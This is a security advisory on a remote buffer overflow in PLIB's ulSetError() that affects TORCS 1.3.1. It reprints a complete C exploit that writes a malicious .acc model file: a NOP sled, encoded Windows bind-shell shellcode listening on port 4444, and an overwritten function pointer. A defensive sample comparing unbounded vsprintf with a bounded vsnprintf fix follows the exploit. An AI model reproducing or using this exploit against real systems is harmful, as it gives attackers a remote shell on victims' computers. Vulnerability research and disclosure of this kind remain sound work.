Published: 2011-12-21
Updated: 2011-12-22

Affected systems:
PLIB PLIB 1.8.5
TORCS TORCS 1.3.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51152

PLIB is a portable game library. PLIB's implementation of the ulSetError() function (src/util/ulError.cxx) contains a remote buffer overflow vulnerability; an attacker can exploit it to execute arbitrary code.

<*Source: Andrés Gómez
  Link: http://secunia.com/advisories/47297/
*>

Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Andrés Gómez () provided the following test method:
http://downloads.securityfocus.com/vulnerabilities/exploits/51152.c

/* Exploit Title: TORCS acc Buffer Overflow
# Date: 20/12/2011
# Author: Andres Gomez
# Software Link: http://torcs.sourceforge.net/
# Version: torcs 1.3.1
# Tested on: Windows
# CVE :
*/

/*
This exploit generates a corrupted acc file
which has to be saved in the directories where
TORCS loads its data, for example replace
cars/car4-trb1/car4-trb1.acc and put test.acc or create
a new car/track and select it in the TORCS menu
*/

#include <stdio.h>
#include <stdlib.h>

/*
Shellcode: windows/shell_bind_tcp LPORT=4444 -b "\x00\xff\x0a"
Encoder: x86/shikata_ga_nai
*/
unsigned char buf[] =
"\xbd\x2e\xed\xb6\x2d\xdd\xc2\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x6e\x0f\x03\x6e\x21\x0f\x43\xd1\xd5\x46"
"\xac\x2a\x25\x39\x24\xcf\x14\x6b\x52\x9b\x04\xbb\x10\xc9\xa4"
"\x30\x74\xfa\x3f\x34\x51\x0d\x88\xf3\x87\x20\x09\x32\x08\xee"
"\xc9\x54\xf4\xed\x1d\xb7\xc5\x3d\x50\xb6\x02\x23\x9a\xea\xdb"
"\x2f\x08\x1b\x6f\x6d\x90\x1a\xbf\xf9\xa8\x64\xba\x3e\x5c\xdf"
"\xc5\x6e\xcc\x54\x8d\x96\x67\x32\x2e\xa6\xa4\x20\x12\xe1\xc1"
"\x93\xe0\xf0\x03\xea\x09\xc3\x6b\xa1\x37\xeb\x66\xbb\x70\xcc"
"\x98\xce\x8a\x2e\x25\xc9\x48\x4c\xf1\x5c\x4d\xf6\x72\xc6\xb5"
"\x06\x57\x91\x3e\x04\x1c\xd5\x19\x09\xa3\x3a\x12\x35\x28\xbd"
"\xf5\xbf\x6a\x9a\xd1\xe4\x29\x83\x40\x41\x9c\xbc\x93\x2d\x41"
"\x19\xdf\xdc\x96\x1b\x82\x88\x5b\x16\x3d\x49\xf3\x21\x4e\x7b"
"\x5c\x9a\xd8\x37\x15\x04\x1e\x37\x0c\xf0\xb0\xc6\xae\x01\x98"
"\x0c\xfa\x51\xb2\xa5\x82\x39\x42\x49\x57\xed\x12\xe5\x07\x4e"
"\xc3\x45\xf7\x26\x09\x4a\x28\x56\x32\x80\x5f\x50\xfc\xf0\x0c"
"\x37\xfd\x06\xa3\x9b\x88\xe1\xa9\x33\xdd\xba\x45\xf6\x3a\x73"
"\xf2\x09\x69\x2f\xab\x9d\x25\x39\x6b\xa1\xb5\x6f\xd8\x0e\x1d"
"\xf8\xaa\x5c\x9a\x19\xad\x48\x8a\x50\x96\x1b\x40\x0d\x55\xbd"
"\x55\x04\x0d\x5e\xc7\xc3\xcd\x29\xf4\x5b\x9a\x7e\xca\x95\x4e"
"\x93\x75\x0c\x6c\x6e\xe3\x77\x34\xb5\xd0\x76\xb5\x38\x6c\x5d"
"\xa5\x84\x6d\xd9\x91\x58\x38\xb7\x4f\x1f\x92\x79\x39\xc9\x49"
"\xd0\xad\x8c\xa1\xe3\xab\x90\xef\x95\x53\x20\x46\xe0\x6c\x8d"
"\x0e\xe4\x15\xf3\xae\x0b\xcc\xb7\xdf\x41\x4c\x91\x77\x0c\x05"
"\xa3\x15\xaf\xf0\xe0\x23\x2c\xf0\x98\xd7\x2c\x71\x9c\x9c\xea"
"\x6a\xec\x8d\x9e\x8c\x43\xad\x8a";

// this points to your shellcode
unsigned char function_pointer[] = "\xA8\xCA\x0E\x10";

int main(int argc, char **argv)
{
    FILE *save_fd;
    int i = 0;

    save_fd = fopen("test.acc", "w");
    if (save_fd == NULL) {
        printf("Failed to open \"%s\" for writing", "test.acc");
        return -1;
    }

    /* AC3D header, then a MATERIAL record whose quoted name carries the payload */
    fprintf(save_fd, "AC3Db\n");
    fprintf(save_fd, "MATERIAL \"");
    for (i = 0; i < 607; i++) {
        putc('\x90', save_fd);   /* char constant: putc() takes an int, not a string */
    }
    fprintf(save_fd, "%s%s\" rgb 0.4 0.4 0.4 amb 0.8 0.8 0.8 emis 0.4 0.4 0.4 spec 0.5 0.5 0.5 shi 50 trans 0\n", buf, function_pointer);
    fprintf(save_fd, "OBJECT world\n");
    fprintf(save_fd, "kids %d\n", 5);
    fclose(save_fd);   /* fclose(), not close(): save_fd is a FILE *, not a descriptor */
    return 0;
}

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

PLIB
----
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
http://plib.sourceforge.net/
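As an added illustration of the bug class this advisory describes (this is not PLIB's code, nor the exploit author's): an error-reporting helper of the ulSetError() kind that formats caller-controlled data into a fixed buffer, shown in its unbounded form beside a bounded replacement that reports truncation instead of overflowing. The buffer size, the function names and the "unrecognized material name" message are assumptions; the oversized name fed to it is a constructed sample that mirrors the inflated MATERIAL field in the test file above.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed fixed-size scratch buffer for the formatted error message
   (the size is an assumption for this illustration, not PLIB's value). */
#define ERROR_BUF_SIZE 1024
static char error_buffer[ERROR_BUF_SIZE];

/* Unbounded pattern: vsprintf() never checks the destination size. When a
   %s argument carries a long string taken from a file (such as a material
   name in an .acc model), the formatted message runs past error_buffer. */
void set_error_unbounded(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsprintf(error_buffer, fmt, ap);   /* no bound: overflows on long input */
    va_end(ap);
}

/* Bounded replacement: vsnprintf() writes at most ERROR_BUF_SIZE - 1 bytes
   plus the terminator and returns the length the full message would have
   had, so the caller can detect truncation instead of memory corruption.
   Returns 1 if the message was truncated, 0 otherwise. */
int set_error_bounded(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int needed = vsnprintf(error_buffer, sizeof error_buffer, fmt, ap);
    va_end(ap);
    if (needed < 0) {                  /* encoding error: leave an empty message */
        error_buffer[0] = '\0';
        return 0;
    }
    return needed >= (int)sizeof error_buffer;
}

const char *last_error(void) { return error_buffer; }

size_t last_error_len(void) { return strlen(error_buffer); }

/* Feed a constructed material name of name_len bytes (the kind of field a
   crafted .acc file inflates) through the bounded formatter.
   Returns 1 if truncation occurred, 0 if the message fit, -1 on allocation failure. */
int report_material_name(size_t name_len)
{
    char *name = malloc(name_len + 1);
    if (name == NULL)
        return -1;
    memset(name, 'A', name_len);        /* constructed sample input */
    name[name_len] = '\0';
    int truncated = set_error_bounded("unrecognized material name: %s", name);
    free(name);
    return truncated;
}

int main(void)
{
    /* A 2000-byte name would overrun a 1024-byte buffer under vsprintf();
       under vsnprintf() it is cut at 1023 bytes and reported as truncated. */
    int truncated = report_material_name(2000);
    printf("truncated=%d length=%zu\n", truncated, last_error_len());
    return 0;
}
```

The return value of the bounded version is the part worth keeping in a real fix: a parser that learns its diagnostic was truncated can reject the record (or the whole file) rather than silently continuing, which is the behaviour a defender wants from a loader that reads untrusted model files.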